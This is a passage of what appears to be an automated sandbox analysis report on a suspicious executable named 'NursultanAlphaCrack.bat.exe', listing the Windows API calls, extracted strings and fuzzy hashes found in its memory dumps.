                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        • Opcode ID: a7b37bf07c447119e33f3d6f37729e787e1f56bc3f75b4d396784acd7dda23bd
                                                                                        • Instruction ID: f655101bf77df1b08ebeb91cddeebbb0cff8ee865c7c9865bb469834dbac4d59
                                                                                        • Opcode Fuzzy Hash: a7b37bf07c447119e33f3d6f37729e787e1f56bc3f75b4d396784acd7dda23bd
                                                                                        • Instruction Fuzzy Hash: BB01F436144E896BC32623677C85D2F256DEFE37707250235F919921B2FF618C429261
                                                                                        APIs
                                                                                          • Part of subcall function 001D11CF: ResetEvent.KERNEL32(?), ref: 001D11E1
                                                                                          • Part of subcall function 001D11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001D11F5
                                                                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 001D0F21
                                                                                        • CloseHandle.KERNEL32(?,?), ref: 001D0F3B
                                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 001D0F54
                                                                                        • CloseHandle.KERNEL32(?), ref: 001D0F60
                                                                                        • CloseHandle.KERNEL32(?), ref: 001D0F6C
                                                                                          • Part of subcall function 001D0FE4: WaitForSingleObject.KERNEL32(?,000000FF,001D1206,?), ref: 001D0FEA
                                                                                          • Part of subcall function 001D0FE4: GetLastError.KERNEL32(?), ref: 001D0FF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 1868215902-0
                                                                                        • Opcode ID: 2e33ad5406955c77d70af45347306b3ea2d8cdf9c7b828a30f9b54bc37240878
                                                                                        • Instruction ID: 4b13c5be0657d22c292757e9ce8f26f25c75a16595793fdab006e0b7d8eed9ae
                                                                                        • Opcode Fuzzy Hash: 2e33ad5406955c77d70af45347306b3ea2d8cdf9c7b828a30f9b54bc37240878
                                                                                        • Instruction Fuzzy Hash: CB017172500744FFC722AB64DC84FD6FBAAFB08710F10092AF26B92660CB757A84CB50
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 001EC817
                                                                                          • Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
                                                                                          • Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4
                                                                                        • _free.LIBCMT ref: 001EC829
                                                                                        • _free.LIBCMT ref: 001EC83B
                                                                                        • _free.LIBCMT ref: 001EC84D
                                                                                        • _free.LIBCMT ref: 001EC85F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 79453feee8310de72d3ec33666675200d382216395a6c4277618d99987ee895b
                                                                                        • Instruction ID: b59fcec40a5029b661113b4f226cce5b4808a177b799c1084ff69c78aa280dde
                                                                                        • Opcode Fuzzy Hash: 79453feee8310de72d3ec33666675200d382216395a6c4277618d99987ee895b
                                                                                        • Instruction Fuzzy Hash: 65F01232504A81AB8624DBAAFD85C1E73EABB20B147581819F148D7962CB71FC81CA94
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 001D1FE5
                                                                                        • _wcslen.LIBCMT ref: 001D1FF6
                                                                                        • _wcslen.LIBCMT ref: 001D2006
                                                                                        • _wcslen.LIBCMT ref: 001D2014
                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,001CB371,?,?,00000000,?,?,?), ref: 001D202F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CompareString
                                                                                        • String ID:
                                                                                        • API String ID: 3397213944-0
                                                                                        • Opcode ID: 0a44259fcc40b2675d778b374784ef74bb90b11fe6450331fc6215f9a98e2e71
                                                                                        • Instruction ID: f8fd3ed8f4a1cb1d05ef3510fb5d9e2e99ab0324441fd3569eb048dc0afe8231
                                                                                        • Opcode Fuzzy Hash: 0a44259fcc40b2675d778b374784ef74bb90b11fe6450331fc6215f9a98e2e71
                                                                                        • Instruction Fuzzy Hash: 17F03032008064BFCF265F51EC09DDE7F66EB54770B218416F63A5B061CB72D6A1D6D0
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 001E891E
                                                                                          • Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
                                                                                          • Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4
                                                                                        • _free.LIBCMT ref: 001E8930
                                                                                        • _free.LIBCMT ref: 001E8943
                                                                                        • _free.LIBCMT ref: 001E8954
                                                                                        • _free.LIBCMT ref: 001E8965
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 41c95543f7fb210068ba3230d5ce888b2a0a68418271a59e6c1de20ebfb7c569
                                                                                        • Instruction ID: 04b68c2f65c4ca240d62ea3e3816f30188d73f75308fe0524cf8daed68b1b1e8
                                                                                        • Opcode Fuzzy Hash: 41c95543f7fb210068ba3230d5ce888b2a0a68418271a59e6c1de20ebfb7c569
                                                                                        • Instruction Fuzzy Hash: A6F03A72810962FB872A6F96FC0642D3BA6F7247143452606F519962B2CB338986DB92
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _swprintf
                                                                                        • String ID: %ls$%s: %s
                                                                                        • API String ID: 589789837-2259941744
                                                                                        • Opcode ID: 4ef2543e2d20c7b93c56d2cfe381684f230aa59ae3cce0c513fc577fc0704a8d
                                                                                        • Instruction ID: 435b6ea55b3e6152dd52b2d140f761267028941db0ff0a73ad81ae4545361b9e
                                                                                        • Opcode Fuzzy Hash: 4ef2543e2d20c7b93c56d2cfe381684f230aa59ae3cce0c513fc577fc0704a8d
                                                                                        • Instruction Fuzzy Hash: AD510B352C8304F6FA295AE08D46F36B365BB25B04F25450BF386646E1EBF2E450B71B
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe,00000104), ref: 001E7FAE
                                                                                        • _free.LIBCMT ref: 001E8079
                                                                                        • _free.LIBCMT ref: 001E8083
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
                                                                                        • API String ID: 2506810119-1521777293
                                                                                        • Opcode ID: 56b518d9c9598d8727fcfea44f6f8070a56f1f625369d89d5bf583756a58e4c6
                                                                                        • Instruction ID: 61e03d03376fee098207d642f343707ee9b50bc17851f835b569379a8df1baa1
                                                                                        • Opcode Fuzzy Hash: 56b518d9c9598d8727fcfea44f6f8070a56f1f625369d89d5bf583756a58e4c6
                                                                                        • Instruction Fuzzy Hash: 0531A071A00A98FFDB25DF96D8849AEBBBCEB94310F144066F80897211DB718A45CB61
                                                                                        APIs
                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001E31FB
                                                                                        • _abort.LIBCMT ref: 001E3306
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer_abort
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 948111806-2084237596
                                                                                        • Opcode ID: 84c7b9166237bead998f0e3b6562ab1dda4dd6c5f7a76c40b32148d003396ee4
                                                                                        • Instruction ID: 8bf51ba96c341bbc753fe5678f5667a3c2913cf15aabc26d48873e703de254e9
                                                                                        • Opcode Fuzzy Hash: 84c7b9166237bead998f0e3b6562ab1dda4dd6c5f7a76c40b32148d003396ee4
                                                                                        • Instruction Fuzzy Hash: DC414A7190068AAFCF16DF96CD85EEEBBB5FF48304F188099FA1467211D335AA90DB50
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C7406
                                                                                          • Part of subcall function 001C3BBA: __EH_prolog.LIBCMT ref: 001C3BBF
                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 001C74CD
                                                                                          • Part of subcall function 001C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001C7AAB
                                                                                          • Part of subcall function 001C7A9C: GetLastError.KERNEL32 ref: 001C7AF1
                                                                                          • Part of subcall function 001C7A9C: CloseHandle.KERNEL32(?), ref: 001C7B00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                        • API String ID: 3813983858-639343689
                                                                                        • Opcode ID: 4a5a8d10b9fb3d77461075b58446bb7f0eec81fc3cbaec46553e98edb9c42e3f
                                                                                        • Instruction ID: 74e300d1c69deb4621fe10b5d53cc027cec8122de1dfc914dea458aaca21c704
                                                                                        • Opcode Fuzzy Hash: 4a5a8d10b9fb3d77461075b58446bb7f0eec81fc3cbaec46553e98edb9c42e3f
                                                                                        • Instruction Fuzzy Hash: F431A371D04248AADF11EBA49C45FFE7BA9AF39304F04401AF945A72D2C7B4CA44CB61
                                                                                        APIs
                                                                                          • Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
                                                                                          • Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370
                                                                                        • EndDialog.USER32(?,00000001), ref: 001DAD98
                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 001DADAD
                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 001DADC2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: ASKNEXTVOL
                                                                                        • API String ID: 445417207-3402441367
                                                                                        • Opcode ID: ccf4ad0f422d29e93fac4b8300537d32d34f81e98ab28b5619265d0926643a9b
                                                                                        • Instruction ID: ce8a38bc02434876f8b3fea335332dbb1009e80228edaf8a50abcdce910a7a95
                                                                                        • Opcode Fuzzy Hash: ccf4ad0f422d29e93fac4b8300537d32d34f81e98ab28b5619265d0926643a9b
                                                                                        • Instruction Fuzzy Hash: D5119632244600BFD721DFE8EC49FA6776AEF6A742F900016F241D76A1C761DA169723
                                                                                        APIs
                                                                                        • __fprintf_l.LIBCMT ref: 001CD954
                                                                                        • _strncpy.LIBCMT ref: 001CD99A
                                                                                          • Part of subcall function 001D1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00201030,00000200,001CD928,00000000,?,00000050,00201030), ref: 001D1DC4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                        • String ID: $%s$@%s
                                                                                        • API String ID: 562999700-834177443
                                                                                        • Opcode ID: 83f71874b4aff4fd42811dcd4a86cbd282419a985cf843c4b1a503c01ede3baf
                                                                                        • Instruction ID: c34603849f8a3d44206a6604d25f09bd5456ce0dc4aa440564d20c0b20f75c21
                                                                                        • Opcode Fuzzy Hash: 83f71874b4aff4fd42811dcd4a86cbd282419a985cf843c4b1a503c01ede3baf
                                                                                        • Instruction Fuzzy Hash: 5D21757644034CAEDF21DEA4DC06FEE7BE8AF25708F044526F914961A2E372D645CB51
                                                                                        APIs
                                                                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,001CAC5A,00000008,?,00000000,?,001CD22D,?,00000000), ref: 001D0E85
                                                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,001CAC5A,00000008,?,00000000,?,001CD22D,?,00000000), ref: 001D0E8F
                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,001CAC5A,00000008,?,00000000,?,001CD22D,?,00000000), ref: 001D0E9F
                                                                                        Strings
                                                                                        • Thread pool initialization failed., xrefs: 001D0EB7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                        • String ID: Thread pool initialization failed.
                                                                                        • API String ID: 3340455307-2182114853
                                                                                        • Opcode ID: 523fc07bfed4e3643daff4aa55e58c78a53a21ee8bec8a5e49a94033c91c14ba
                                                                                        • Instruction ID: 4818dfd08089871065c2f75477ae662d3adac5c18311fb56a1db36d6fee0caf9
                                                                                        • Opcode Fuzzy Hash: 523fc07bfed4e3643daff4aa55e58c78a53a21ee8bec8a5e49a94033c91c14ba
                                                                                        • Instruction Fuzzy Hash: 29114FB1640708ABC3215F6A9C84AA7FBECEB69754F504C2FF1DA82200DB7199818B64
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                        • API String ID: 0-56093855
                                                                                        • Opcode ID: 08251870770777a78be193ef76cfafb573d53e0dae8f72e61806b0be121d16df
                                                                                        • Instruction ID: b39131dbf7db3ab43160a8cb351a473bc65d77f1477c22403514ff3a21f8835a
                                                                                        • Opcode Fuzzy Hash: 08251870770777a78be193ef76cfafb573d53e0dae8f72e61806b0be121d16df
                                                                                        • Instruction Fuzzy Hash: 7F017176604749AFDF158FA4FC48AAB7BAAF708354B114427F94593372CB319860DBE0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: __alldvrm$_strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 1036877536-0
                                                                                        • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                        • Instruction ID: a55cb4ac0c8f25c8ab0bbb7f340712d352e08fc12181aef969fd040d5b5d60dc
                                                                                        • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                        • Instruction Fuzzy Hash: D4A16B72900BC69FDB25DF1AC8917BEBBE5EF65310F2441ADE5459B281C3748D41C750
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,001C7F69,?,?,?), ref: 001CA3FA
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,001C7F69,?), ref: 001CA43E
                                                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,001C7F69,?,?,?,?,?,?,?), ref: 001CA4BF
                                                                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,001C7F69,?,?,?,?,?,?,?,?,?,?), ref: 001CA4C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 2287278272-0
                                                                                        • Opcode ID: 2e8aa35a86762e570055cfa64c266891d56163dc1289b1fab945b05919b30462
